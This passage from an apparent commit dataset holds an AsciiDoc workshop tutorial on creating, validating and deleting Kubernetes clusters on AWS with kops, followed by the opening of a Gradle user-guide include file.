resources is required as shown below:\n\n # Find Route53 hosted zone ID from the console or via CLI and delete hosted zone\n aws route53 delete-hosted-zone --id $ZONEID\n # Delete VPC if you created earlier\n $ aws ec2 detach-internet-gateway --internet $IGW --vpc $VPCID\n aws ec2 delete-internet-gateway --internet-gateway-id $IGW\n aws ec2 delete-vpc --vpc-id $VPCID\n\nTo remove the state store S3 bucket:\n\n aws s3 rb $KOPS_STATE_STORE\n\n== Appendix: Create a DNS-based Kubernetes cluster\n\nTo create a DNS-based Kubernetes cluster you'll need a top-level domain or subdomain that meets one of the following scenarios:\n\n. Domain purchased\/hosted via AWS\n. A subdomain under a domain purchased\/hosted via AWS\n. Setting up Route53 for a domain purchased with another registrar, transfering the domain to Route53\n. Subdomain for clusters in Route53, leaving the domain at another registrar\n\nThen you need to follow the instructions in https:\/\/github.com\/kubernetes\/kops\/blob\/master\/docs\/aws.md#configure-dns[configure DNS]. Typically, the first and the last bullets are common scenarios.\n\n==== Default DNS-based cluster\n\nBy default, `create cluster` command creates a single master node and two worker nodes in the specified zones.\n\nCreate a Kubernetes cluster using the following command. For the purposes of this demonstration, we will use a cluster name of example.cluster.com as our registered DNS. This will create a cluster with a single master, multi-node and multi-az configuration:\n\n $ kops create cluster \\\n --name example.cluster.com \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nThe `create cluster` command only creates and stores the cluster config in the S3 bucket. Adding `--yes` option ensures that the cluster is immediately created as well.\n\nAlternatively, you may leave off the `--yes` option from the `kops create cluster` command. This will allow you to use `kops edit cluster example.cluster.com` command to view the current cluster state and make changes before actually creating the cluster. \n\nThe cluster creation, in that case, is started with the following command:\n\n $ kops update cluster example.cluster.com --yes\n\nOnce the `kops create cluster` or `kops update cluster` command is issued with the `--yes` flag,, it provisions the EC2 instances, setup Auto Scaling Groups, IAM users, security groups, and install Kubernetes on each node, configures master and worker nodes. This process can take a few minutes based upon the number of master and worker nodes.\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster --name=example.cluster.com\nValidating cluster example.cluster.com\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-51-232.ec2.internal node True\nip-172-20-60-192.ec2.internal master True\nip-172-20-91-39.ec2.internal node True\n\nYour cluster example.cluster.com is ready\n```\n\nVerify the client and server version:\n\n $ kubectl version\n Client Version: version.Info{Major:\"1\", Minor:\"8\", GitVersion:\"v1.8.1\", GitCommit:\"f38e43b221d08850172a9a4ea785a86a3ffa3b3a\", GitTreeState:\"clean\", BuildDate:\"2017-10-12T00:45:05Z\", GoVersion:\"go1.9.1\", Compiler:\"gc\", Platform:\"darwin\/amd64\"}\n Server Version: version.Info{Major:\"1\", Minor:\"7\", GitVersion:\"v1.7.4\", GitCommit:\"793658f2d7ca7f064d2bdf606519f9fe1229c381\", GitTreeState:\"clean\", BuildDate:\"2017-08-17T08:30:51Z\", GoVersion:\"go1.8.3\", Compiler:\"gc\", Platform:\"linux\/amd64\"}\n\nIt shows that Kubectl CLI version is 1.8.1 and the server version is 1.7.4. Cluster version may changed depending on kops version.\n\n==== Multi-master, multi-node, multi-az DNS-based cluster\n\nCheck the list of Availability Zones that exist for your region using the following command:\n\n $ aws --region <region> ec2 describe-availability-zones\n\nCreate a cluster with multi-master, multi-node and multi-az configuration. We can create and build the cluster in\none step by passing the `--yes` flag.\n\n $ kops create cluster \\\n --name example.cluster.com \\\n --master-count 3 \\\n --node-count 5 \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nA multi-master cluster can be created by using the `--master-count` option and specifying the number of master nodes. An odd value is recommended. By default, the master nodes are spread across the AZs specified using the `--zones` option. Alternatively, `--master-zones` option can be used to explicitly specify the zones for the master nodes.\n\n`--zones` option is also used to distribute the worker nodes. The number of workers is specified using the `--node-count` option.\n\nAs mentioned above, wait for 5-8 minutes for the cluster to be created. Validate the cluster:\n\n```\n$ kops validate cluster --name=example.cluster.com\nValidating cluster example.cluster.com\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nmaster-eu-central-1b Master m3.medium 1 1 eu-central-1b\nmaster-eu-central-1c Master c4.large 1 1 eu-central-1c\nnodes Node t2.medium 5 5 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-103-30.ec2.internal master True\nip-172-20-105-16.ec2.internal node True\nip-172-20-127-147.ec2.internal node True\nip-172-20-35-38.ec2.internal node True\nip-172-20-47-199.ec2.internal node True\nip-172-20-61-207.ec2.internal master True\nip-172-20-75-78.ec2.internal master True\nip-172-20-94-216.ec2.internal node True\n\nYour cluster example.cluster.com is ready\n```\n\nNote that all masters are spread across different AZs.\n\nYour output may differ from the one shown here based up on the type of cluster you created.\n\nYou are now ready to link:..\/103-kubernetes-concepts[continue on with the workshop.]\n","old_contents":"= Create A Kubernetes Cluster Using kops\n:toc:\n:icons:\n:linkcss:\n:imagesdir: ..\/..\/resources\/images\n\nThis tutorial will walk you through how to install a Kubernetes cluster on AWS using kops.\n\nhttps:\/\/github.com\/kubernetes\/kops[kops], short for Kubernetes Operations, is a set of tools for installing, operating, and deleting Kubernetes clusters. kops can also perform rolling upgrades from older versions of Kubernetes to newer ones. kops also manages the cluster add-ons. After the cluster is created, the link:..\/prereqs.adoc[Kubernetes CLI] can be used to manage resources in the cluster. If you have not gone through the link:..\/prereqs.adoc[Prerequisites] section, please do so now before continuing.\n\nIf you have not set up the link:..\/101-start-here[Cloud9 Devlopment Environment] yet, please do so before continuing.\n\n== Create A Cluster with kops\n\nThe kops CLI can be used to create a highly available cluster, with multiple master nodes spread across multiple Availability Zones. Workers can be spread across multiple zones as well. Some of the tasks that happen behind the scene during cluster creation are:\n\n- Provisioning EC2 instances\n- Creating and configuring AWS resources such as a VPC, Auto Scaling Groups, IAM users, and security groups\n- Installing Kubernetes\n- If required configuring Route53 DNS\n\nWhen setting up a cluster you have two options on how the nodes in the cluster communicate:\n\n. <<create-a-gossip-based-kubernetes-cluster-with-kops, Using the gossip protocol>> - kops has support for a gossip-based cluster. This does not require a domain, subdomain, or Route53 hosted zone to be registered. A gossip-based cluster is therefore easier and quicker to setup, and is the preferred method for creating a cluster for use with this workshop.\n. <<appendix-create-a-dns-based-kubernetes-cluster, Using DNS>> - Creating a Kubernetes cluster that uses DNS for node discovery requires your own domain (or subdomain) and setting up Route 53 hosted zones. This allows the various Kubernetes components to use DNS resolutions find and communicate with each other, and for kubectl to be able to talk directly with the master node(s).\n\nInstructions for creating a gossip-based cluster are provided below, however, the examples in the workshop should work with either option. Instructions for creating a DNS-based cluster are provided as an appendix at the bottom of this page.\n\n=== Create a Gossip Based Kubernetes Cluster with kops\n\nkops supports creating a gossip-based cluster, which uses https:\/\/github.com\/weaveworks\/mesh[Weave Mesh] behind the scenes. This makes the process of creating a Kubernetes cluster using kops DNS-free, and therefore much simpler. This also means a top-level domain or a subdomain is no longer required to create the cluster. To create a cluster using the gossip protocol, indicate this to by using a cluster name with a suffix of `.k8s.local`. In the following steps, we will use example.cluster.k8s.local as a sample gossip cluster name. You may choose a different name as long as it ends with `.k8s.local`.\n\nInformation on setting up a DNS-based cluster can be found at the bottom of this page in the Appendix. However, setting up a gossip-based cluster allows you to get started quickly.\n\nWe show two examples of creating gossip-based clusters below. You can choose whether to create a single-master or multi-master cluster. Most workshop exercises will work on both types of cluster, however some modules require using a multi-master cluster (to demonstrate rolling updates, for instance.) If you aren't sure, please create a <<multi-master-multi-node-multi-az-gossip-based-cluster, multi-master cluster.>>\n\n==== Default Gossip Based Cluster\n\nBy default, `create cluster` command creates a single master node and two worker nodes in the specified zones.\n\nCreate a Kubernetes cluster using the following command. This will create a cluster with a single master, multi-node and multi-az configuration:\n\n $ kops create cluster \\\n --name example.cluster.k8s.local \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nThe `AWS_AVAILABILITY_ZONES` environment variable should have been set during the link:..\/101-start-here[Cloud9 Environment Setup].\n\nThe `create cluster` command only creates and stores the cluster config in the S3 bucket. Adding the `--yes` flag ensures that the cluster is immediately created as well.\n\nAlternatively, you may not specify the `--yes` flag as part of the `kops create cluster` command. Then you can use `kops edit cluster example.cluster.k8s.local` command to view the current cluster state and make changes. The cluster creation, in that case, is started with the following command:\n\n $ kops update cluster example.cluster.k8s.local --yes\n\nOnce the `kops create cluster` command is issued, it provisions the EC2 instances, sets up Auto Scaling Groups, IAM users, Security Groups, installs Kubernetes on each node, then configures the master and worker nodes. This process can take some time based upon the number of master and worker nodes.\n\nNote: If your 'create cluster' fails with an error like:\n```\nerror reading s3:\/\/example-kops-state-store-workshop\/workshop-prep.cluster.k8s.local\/config: Unable to list AWS regions: NoCredentialProviders: no valid providers in chain\ncaused by: EnvAccessKeyNotFound: failed to find credentials in the environment.\"\n```\n, try setting the following environment variables before executing the 'create cluster' command:\n```\nexport AWS_DEFAULT_PROFILE=<your_aws_credentials_profile_name>\nexport AWS_SDK_LOAD_CONFIG=1\n```\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-57-94.ec2.internal master True\nip-172-20-63-55.ec2.internal node True\nip-172-20-75-78.ec2.internal node True\n\nYour cluster example.cluster.k8s.local is ready\n```\n==== Multi-master, multi-node, multi-az Gossip Based Cluster\n\nCreate a cluster with multi-master, multi-node and multi-az configuration. We can create and build the cluster in one step by passing the `--yes` flag.\n\n $ kops create cluster \\\n --name example.cluster.k8s.local \\\n --master-count 3 \\\n --node-count 5 \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nA multi-master cluster can be created by using the `--master-count` option and specifying the number of master nodes. An odd value is recommended. By default, the master nodes are spread across the AZs specified using the `--zones` option. Alternatively, `--master-zones` option can be used to explicitly specify the zones for the master nodes.\n\nThe `--zones` option is also used to distribute the worker nodes. The number of workers is specified using the `--node-count` option.\n\nIt will take 5-8 minutes for the cluster to be created. Validate the cluster:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nmaster-eu-central-1b Master m3.medium 1 1 eu-central-1b\nmaster-eu-central-1c Master c4.large 1 1 eu-central-1c\nnodes Node t2.medium 5 5 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-101-97.ec2.internal node True\nip-172-20-119-53.ec2.internal node True\nip-172-20-124-138.ec2.internal master True\nip-172-20-35-15.ec2.internal master True\nip-172-20-63-104.ec2.internal node True\nip-172-20-69-241.ec2.internal node True\nip-172-20-84-65.ec2.internal node True\nip-172-20-93-167.ec2.internal master True\n\nYour cluster example.cluster.k8s.local is ready\n```\n\nNote that all masters are spread across different AZs.\n\nYour output may differ slightly from the one shown here based up on the type of cluster you created.\n\nimage:next-step-arrow.png[ , title=\"Continue!\"] You are now ready to continue on with the workshop!\nThe next step is link:..\/103-kubernetes-concepts[to learn about basic Kubernetes Concepts].\n\n\n=== (Optional) Create a Kubernetes cluster in a private VPC\n\nkops can create a private Kubernetes cluster, where the master and worker nodes are launched in private subnets in a VPC. This is possible with both Gossip and DNS-based clusters. This reduces the attack surface on your instances by protecting them behind security groups inside private subnets. The services hosted in the cluster can still be exposed via internet-facing ELBs if required. It's necessary to run a CNI network provider in the Kubernetes cluster when using a private topology. We have used https:\/\/www.projectcalico.org\/[Calico] below, though other options such as `kopeio-vxlan`, `weave`, `romano` and others are available.\n\nTo print full list of CNI providers:\n\n kops create cluster --help\n\nCreate a gossip-based private cluster with master and worker nodes in private subnets:\n\n $ kops create cluster \\\n --networking calico \\\n --topology private \\\n --name example.cluster.k8s.local \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nOnce the `kops create cluster` command is issued, it provisions the EC2 instances, sets up AutoScaling Groups, IAM users, Security Groups, installs Kubernetes on each node, then configures the master and worker nodes. This process can take some time based upon the number of master and worker nodes.\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-124-144.eu-central-1.compute.internal node True\nip-172-20-58-179.eu-central-1.compute.internal master True\nip-172-20-93-220.eu-central-1.compute.internal node True\n\nYour cluster example.cluster.k8s.local is ready\n```\n\nIt is also possible to create a DNS-based cluster where the master and worker nodes are in private subnets. For more information about creating DNS-based clusters, see Appendix: Create a DNS-based Kubernetes cluster below.\nIf `--dns private` is also specified, a Route53 private hosted zone is created for routing the traffic for the domain within one or more VPCs. The Kubernetes API can therefore only be accessed from within the VPC. This is a current issue with kops (see https:\/\/github.com\/kubernetes\/kops\/issues\/2032). A possible workaround is to mirror the private Route53 hosted zone with a public hosted zone that exposes only the API server ELB endpoint. This workaround is discussed http:\/\/kubecloud.io\/setup-ha-k8s-kops\/[here].\n\nAlthough most of the exercises in this workshop should work on a cluster with a private VPC, some commands won't, specifically those that use a proxy to access internally hosted services.\n\n== Kubernetes Cluster Context\n\nYou may create multiple Kubernetes clusters. The configuration for each cluster is stored in a configuration file, referred to as \"`kubeconfig file`\". By default, kubectl looks for a file named `config` in the directory `~\/.kube`. The kubectl CLI uses kubeconfig file to find the information it needs to choose a cluster and communicate with the API server of a cluster.\n\nThis allows you to deploy your applications to different environments by just changing the context. For example, here is a typical flow for application development:\n\n. Build your application using minikube (See Set up Local Development Environment for more information)\n. Change the context to a test cluster created on AWS\n. Use the same command to deploy to test environment\n. Once satisfied, change the context again to a production cluster on AWS\n. Once again, use the same command to deploy to production environment\n\nGet a summary of available contexts:\n\n $ kubectl config get-contexts\n kubectl config get-contexts\n CURRENT NAME CLUSTER AUTHINFO NAMESPACE\n * example.cluster.k8s.local example.cluster.k8s.local example.cluster.k8s.local\n minikube minikube minikube\n\nThe output shows dfferent contexts, one per cluster, that are available to kubectl. `NAME` column shows the context name. `*` indicates the current context.\n\nView the current context:\n\n $ kubectl config current-context\n example.cluster.k8s.local\n\nIf multiple clusters exist, then you can change the context:\n\n $ kubectl config use-context <config-name>\n\n== Turn on an API version for your Cluster\n\nNote: This section is for Kubebernetes 1.7.x, in 1.8.x the api is `batch\/v1beta1`. \n\nKubernetes resources are created with a specific API version. The exact value is defined by the `apiVersion` attribute in the resource configuration file. Some of the values are `v1`, `extensions\/v1beta1` or `batch\/v1`. By default, resources with `apiVersion` values X, Y, Z are enabled. If a resource has a version with the word `alpha` in it, then that version needs to be explicitly enabled in the cluster. For example, if you are running a Kubernetes cluster of version 1.7.x, then Cron Job resource cannot be created unless `batch\/v2alpha1` is explicitly enabled.\n\nThis section shows how to turn on an API version for your cluster. It will use `batch\/v2alpha1` as an example.\n\nSpecific API versions can be turned on or off by passing `--runtime-config=api\/<version>` flag while bringing up the API server. To turn on our specific version, we'll need to pass `--runtime-config=batch\/v2alpha1=true`.\n\nFor a cluster created using kops, this can be done by editing the cluster configuration using the command shown:\n\n $ kops edit cluster --name example.cluster.k8s.local\n\nThis will open up the cluster configuration in a text editor. Update the `spec` attribute such that it looks like as shown:\n\n spec:\n kubeAPIServer:\n runtimeConfig:\n batch\/v2alpha1: \"true\"\n api:\n\nSave the changes and exit the editor. Kubernetes cluster needs to re-read the configuration. This can be done by forcing a rolling update of the cluster using the following command:\n\nNOTE: This process can easily take 30-45 minutes. Its recommended to leave the cluster without any updates during that time.\n\n $ kops rolling-update cluster --yes\n Using cluster from kubectl context: example.cluster.k8s.local\n\n NAME STATUS NEEDUPDATE READY MIN MAX NODES\n master-eu-central-1a Ready 0 1 1 1 1\n nodes Ready 0 2 2 2 2\n I1025 20:50:51.158013 354 instancegroups.go:350] Stopping instance \"i-0ba714556f0f892cc\", node \"ip-172-20-58-179.eu-central-1.compute.internal\", in AWS ASG \"master-eu-central-1a.masters.example.cluster.k8s.local\".\n I1025 20:55:51.413506 354 instancegroups.go:350] Stopping instance \"i-0265a07c3320b266b\", node \"ip-172-20-93-220.eu-central-1.compute.internal\", in AWS ASG \"nodes.example.cluster.k8s.local\".\n I1025 20:57:52.448582 354 instancegroups.go:350] Stopping instance \"i-09e2efd9f5e9ebfce\", node \"ip-172-20-124-144.eu-central-1.compute.internal\", in AWS ASG \"nodes.example.cluster.k8s.local\".\n I1025 20:59:53.325980 354 rollingupdate.go:174] Rolling update completed!\n\nThis command will first stop one master node in the cluster, re-read the configuration information and start that master. Then it will do the same for rest of the master nodes. And then it will repeat that for each worker node in the cluster. After all the server and worker nodes have been restarted, the rolling update of the cluster is complete.\n\nLet's verify that the attributes are now successfully passed to the API server. Get the list of pods for the API server using the command shown:\n\n $ kubectl get pods --all-namespaces | grep kube-apiserver\n kube-system kube-apiserver-ip-172-20-117-32.ec2.internal 1\/1 Running 0 7m\n kube-system kube-apiserver-ip-172-20-62-108.ec2.internal 1\/1 Running 6 16m\n kube-system kube-apiserver-ip-172-20-79-64.ec2.internal 1\/1 Running 2 12m\n\nThe output shows three pods, one each for API server, corresponding to the three master nodes. This output is from a cluster with three master nodes. The output may be different if your cluster was created with different number of masters.\n\nSearch for the `--runtime-config` option as shown:\n\n $ kubectl describe --namespace=kube-system pod <pod-name> | grep runtime\n\n`<pod-name>` is name of one of the pods shown above.\n\nA formatted output is shown below:\n\n \/usr\/local\/bin\/kube-apiserver \\\n --address=127.0.0.1 \\\n --admission-control=NamespaceLifecycle,LimitRanger,ServiceAccount,PersistentVolumeLabel,DefaultStorageClass,DefaultTolerationSeconds,ResourceQuota \\\n --allow-privileged=true \\\n --anonymous-auth=false \\\n --apiserver-count=3 \\\n --authorization-mode=AlwaysAllow \\\n --basic-auth-file=\/srv\/kubernetes\/basic_auth.csv \\\n --client-ca-file=\/srv\/kubernetes\/ca.crt \\\n --cloud-provider=aws \\\n --etcd-servers-overrides=\/events#http:\/\/127.0.0.1:4002 \\\n --etcd-servers=http:\/\/127.0.0.1:4001 --insecure-port=8080 --kubelet-preferred-address-types=InternalIP,Hostname,ExternalIP \\\n --runtime-config=batch\/v2alpha1=true \\\n --secure-port=443 \\\n --service-cluster-ip-range=100.64.0.0\/13 \\\n --storage-backend=etcd2 \\\n --tls-cert-file=\/srv\/kubernetes\/server.cert \\\n --tls-private-key-file=\/srv\/kubernetes\/server.key \\\n --token-auth-file=\/srv\/kubernetes\/known_tokens.csv \\\n --v=2 \\\n 1>>\/var\/log\/kube-apiserver.log 2>&1\n\nThe output clearly shows that `--runtime-config=batch\/v2alpha1=true` is passed as an option to the API server. This means the cluster is now ready for creating creating APIs with version `batch\/v2alpha1`.\n\n== Instance Groups with kops\n\nAn instance group, or ig for short, is a kops concept that defines a grouping of similar nodes. In AWS, an instance group maps to an Auto Scaling Group (ASG). Instructions on how to create instance groups can be found link:instance-groups\/readme.adoc[here].\n\n== Delete A Cluster\n\nAny cluster can be deleted as shown:\n\n $ kops delete cluster \\\n <cluster-name> \\\n --yes\n\n`<cluster-name>` is the name of the cluster. For example, our `example.cluster.k8s.local` cluster can be deleted as:\n\n $ kops delete cluster \\\n example.cluster.k8s.local \\\n --yes\n\nIf you leave off the `--yes` flag, you will get a listing of all the resources kops will delete. To confirm deletion, run the command again appending `--yes`.\n\nIf you created a private VPC, then an additional cleanup of resources is required as shown below:\n\n # Find Route53 hosted zone ID from the console or via CLI and delete hosted zone\n aws route53 delete-hosted-zone --id $ZONEID\n # Delete VPC if you created earlier\n $ aws ec2 detach-internet-gateway --internet $IGW --vpc $VPCID\n aws ec2 delete-internet-gateway --internet-gateway-id $IGW\n aws ec2 delete-vpc --vpc-id $VPCID\n\nTo remove the state store S3 bucket:\n\n aws s3 rb $KOPS_STATE_STORE\n\n== Appendix: Create a DNS-based Kubernetes cluster\n\nTo create a DNS-based Kubernetes cluster you'll need a top-level domain or subdomain that meets one of the following scenarios:\n\n. Domain purchased\/hosted via AWS\n. A subdomain under a domain purchased\/hosted via AWS\n. Setting up Route53 for a domain purchased with another registrar, transfering the domain to Route53\n. Subdomain for clusters in Route53, leaving the domain at another registrar\n\nThen you need to follow the instructions in https:\/\/github.com\/kubernetes\/kops\/blob\/master\/docs\/aws.md#configure-dns[configure DNS]. Typically, the first and the last bullets are common scenarios.\n\n==== Default DNS-based cluster\n\nBy default, `create cluster` command creates a single master node and two worker nodes in the specified zones.\n\nCreate a Kubernetes cluster using the following command. For the purposes of this demonstration, we will use a cluster name of example.cluster.com as our registered DNS. This will create a cluster with a single master, multi-node and multi-az configuration:\n\n $ kops create cluster \\\n --name example.cluster.com \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nThe `create cluster` command only creates and stores the cluster config in the S3 bucket. Adding `--yes` option ensures that the cluster is immediately created as well.\n\nAlternatively, you may leave off the `--yes` option from the `kops create cluster` command. This will allow you to use `kops edit cluster example.cluster.com` command to view the current cluster state and make changes before actually creating the cluster. \n\nThe cluster creation, in that case, is started with the following command:\n\n $ kops update cluster example.cluster.com --yes\n\nOnce the `kops create cluster` or `kops update cluster` command is issued with the `--yes` flag,, it provisions the EC2 instances, setup Auto Scaling Groups, IAM users, security groups, and install Kubernetes on each node, configures master and worker nodes. This process can take a few minutes based upon the number of master and worker nodes.\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster --name=example.cluster.com\nValidating cluster example.cluster.com\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-51-232.ec2.internal node True\nip-172-20-60-192.ec2.internal master True\nip-172-20-91-39.ec2.internal node True\n\nYour cluster example.cluster.com is ready\n```\n\nVerify the client and server version:\n\n $ kubectl version\n Client Version: version.Info{Major:\"1\", Minor:\"8\", GitVersion:\"v1.8.1\", GitCommit:\"f38e43b221d08850172a9a4ea785a86a3ffa3b3a\", GitTreeState:\"clean\", BuildDate:\"2017-10-12T00:45:05Z\", GoVersion:\"go1.9.1\", Compiler:\"gc\", Platform:\"darwin\/amd64\"}\n Server Version: version.Info{Major:\"1\", Minor:\"7\", GitVersion:\"v1.7.4\", GitCommit:\"793658f2d7ca7f064d2bdf606519f9fe1229c381\", GitTreeState:\"clean\", BuildDate:\"2017-08-17T08:30:51Z\", GoVersion:\"go1.8.3\", Compiler:\"gc\", Platform:\"linux\/amd64\"}\n\nIt shows that Kubectl CLI version is 1.8.1 and the server version is 1.7.4. Cluster version may changed depending on kops version.\n\n==== Multi-master, multi-node, multi-az DNS-based cluster\n\nCheck the list of Availability Zones that exist for your region using the following command:\n\n $ aws --region <region> ec2 describe-availability-zones\n\nCreate a cluster with multi-master, multi-node and multi-az configuration. We can create and build the cluster in\none step by passing the `--yes` flag.\n\n $ kops create cluster \\\n --name example.cluster.com \\\n --master-count 3 \\\n --node-count 5 \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nA multi-master cluster can be created by using the `--master-count` option and specifying the number of master nodes. An odd value is recommended. By default, the master nodes are spread across the AZs specified using the `--zones` option. Alternatively, `--master-zones` option can be used to explicitly specify the zones for the master nodes.\n\n`--zones` option is also used to distribute the worker nodes. The number of workers is specified using the `--node-count` option.\n\nAs mentioned above, wait for 5-8 minutes for the cluster to be created. Validate the cluster:\n\n```\n$ kops validate cluster --name=example.cluster.com\nValidating cluster example.cluster.com\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nmaster-eu-central-1b Master m3.medium 1 1 eu-central-1b\nmaster-eu-central-1c Master c4.large 1 1 eu-central-1c\nnodes Node t2.medium 5 5 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-103-30.ec2.internal master True\nip-172-20-105-16.ec2.internal node True\nip-172-20-127-147.ec2.internal node True\nip-172-20-35-38.ec2.internal node True\nip-172-20-47-199.ec2.internal node True\nip-172-20-61-207.ec2.internal master True\nip-172-20-75-78.ec2.internal master True\nip-172-20-94-216.ec2.internal node True\n\nYour cluster example.cluster.com is ready\n```\n\nNote that all masters are spread across different AZs.\n\nYour output may differ from the one shown here based up on the type of cluster you created.\n\nYou are now ready to link:..\/103-kubernetes-concepts[continue on with the workshop.]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62013d9dd964745cf82a3d06981a546e9f8d7840","subject":"Add missing \"Java Platform plugin\" section in userguide","message":"Add missing \"Java Platform plugin\" section in userguide\n","repos":"robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/userguide_single.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/userguide_single.adoc","new_contents":"\/\/ Copyright 2018 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n= Gradle User Manual: Version {gradleVersion}\n:description: Single-page Gradle User Manual for Gradle {gradleVersion}\n:meta-name-robots: noindex\n:meta-name-twitter_card: summary\n:meta-name-twitter_site: @gradle\n:meta-name-twitter_creator: @gradle\n:meta-name-twitter_title: {doctitle}\n:meta-name-twitter_description: {description}\n:meta-name-twitter_url: {docsUrl}\/{gradleVersion}\/userguide\/{docname}.html\n:meta-name-twitter_image: {website}\/images\/gradle-256x256.png\n\ntoc::[]\n\n[[part:about_gradle]]\n== About Gradle\n\ninclude::overview.adoc[leveloffset=+2]\n\ninclude::what_is_gradle.adoc[leveloffset=+2]\n\n[[part:getting_started]]\n== Getting Started\n\ninclude::getting_started.adoc[leveloffset=2]\n\ninclude::installation.adoc[leveloffset=+2]\n\ninclude::troubleshooting.adoc[leveloffset=+2]\n\n[[part:upgrading_and_migrating]]\n== Upgrading and Migrating\n\ninclude::upgrading_version_5.adoc[leveloffset=+2]\ninclude::upgrading_version_4.adoc[leveloffset=+2]\n\ninclude::migrating_from_ant.adoc[leveloffset=+2]\n\n[[part:running_builds]]\n== Running Gradle Builds\n\ninclude::build_environment.adoc[leveloffset=+2]\n\ninclude::gradle_daemon.adoc[leveloffset=+2]\n\ninclude::init_scripts.adoc[leveloffset=+2]\n\ninclude::intro_multi_project_builds.adoc[leveloffset=+2]\n\ninclude::build_cache.adoc[leveloffset=+2]\n\ninclude::composite_builds.adoc[leveloffset=+2]\n\n[[part:authoring_builds]]\n== Authoring Gradle Builds\n\ninclude::tutorial_using_tasks.adoc[leveloffset=+2]\n\ninclude::more_about_tasks.adoc[leveloffset=+2]\n\ninclude::writing_build_scripts.adoc[leveloffset=+2]\n\ninclude::working_with_files.adoc[leveloffset=+2]\n\ninclude::custom_tasks.adoc[leveloffset=+2]\n\ninclude::plugins.adoc[leveloffset=+2]\n\ninclude::build_lifecycle.adoc[leveloffset=+2]\n\ninclude::logging.adoc[leveloffset=+2]\n\ninclude::multi_project_builds.adoc[leveloffset=+2]\n\ninclude::organizing_gradle_projects.adoc[leveloffset=+2]\n\ninclude::authoring_maintainable_build_scripts.adoc[leveloffset=+2]\n\ninclude::lazy_configuration.adoc[leveloffset=+2]\n\ninclude::test_kit.adoc[leveloffset=+2]\n\ninclude::ant.adoc[leveloffset=+2]\n\n[[part:dependency_management]]\n== Dependency 